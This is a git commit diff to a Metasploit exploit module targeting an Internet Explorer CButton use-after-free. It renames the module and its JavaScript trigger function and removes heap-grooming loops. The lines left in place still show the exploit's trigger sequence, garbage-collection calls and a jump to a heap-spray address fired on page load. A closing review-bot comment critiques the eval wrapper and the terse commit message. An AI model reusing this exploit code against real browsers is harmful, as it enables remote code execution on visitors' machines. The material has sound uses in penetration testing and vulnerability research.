
Commit f7543e1

committed
Your def of commit apparently is a little different than mine, git.
1 parent 2b3f7c4 commit f7543e1


1 file changed

+3
-34
lines changed


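--- a/modules/exploits/windows/browser/ie_cbutton_uaf.rb
+++ b/modules/exploits/windows/browser/ie_cbutton_uaf.rb
@@ -15,7 +15,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 def initialize(info={})
 super(update_info(info,
-'Name' => "Microsoft Internet Explorer CDwnBindInfo Object Use-After-Free Vulnerability",
+'Name' => "Microsoft Internet Explorer CButton Object Use-After-Free Vulnerability",
 'Description' => %q{
 This module exploits a vulnerability found in Microsoft Internet Explorer. A
 use-after-free condition occurs when a CButton object is freed, but a reference
@@ -187,37 +187,11 @@ def load_exploit_html(my_target, cli)
 <script>
 #{js}
 
-function exploit()
+function helloWorld()
 {
 var e0 = null;
 var e1 = null;
 var e2 = null;
-var arrObject = new Array(3000);
-var elmObject = new Array(500);
-for (var i = 0; i < arrObject.length; i++)
-{
-arrObject[i] = document.createElement('div');
-arrObject[i].className = unescape("ababababababababababababababababababababa");
-}
-
-for (var i = 0; i < arrObject.length; i += 2)
-{
-arrObject[i].className = null;
-}
-
-CollectGarbage();
-
-for (var i = 0; i < elmObject.length; i ++)
-{
-elmObject[i] = document.createElement('button');
-}
-
-for (var i = 1; i < arrObject.length; i += 2)
-{
-arrObject[i].className = null;
-}
-
-CollectGarbage();
 
 try {
 e0 = document.getElementById("a");
@@ -230,19 +204,14 @@ def load_exploit_html(my_target, cli)
 e2.appendChild(document.createElement('body'));
 } catch(e) { }
 CollectGarbage();
-for(var i =0; i < 20; i++)
-{
-arrObject[i].className = unescape("ababababababababababababababababababababa");
-}
 var eip = window;
 var data = "#{Rex::Text.rand_text_alpha(41)}";
 eip.location = unescape("%u0b30%u0c0c" + data);
-
 }
 
 </script>
 </head>
-<body onload="eval(exploit())">
+<body onload="eval(helloWorld())">
 <form id="a">
 </form>
 <dfn id="b">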
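Review bot: In the last hunk the handler is still written as `onload="eval(helloWorld())"`, which calls the function and then hands its return value to `eval`; the lines shown contain no `return`, so this looks like `eval(undefined)` and the wrapper does nothing. `<body onload="helloWorld()">` would express the same call without the stray `eval`. Part of the function body lies between the second and third hunks, so a `return` outside the shown lines cannot be ruled out. The commit message also gives no reason for dropping the allocation loops or for the rename; a one-line explanation there would help anyone maintaining detection content that matched the old page markup.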
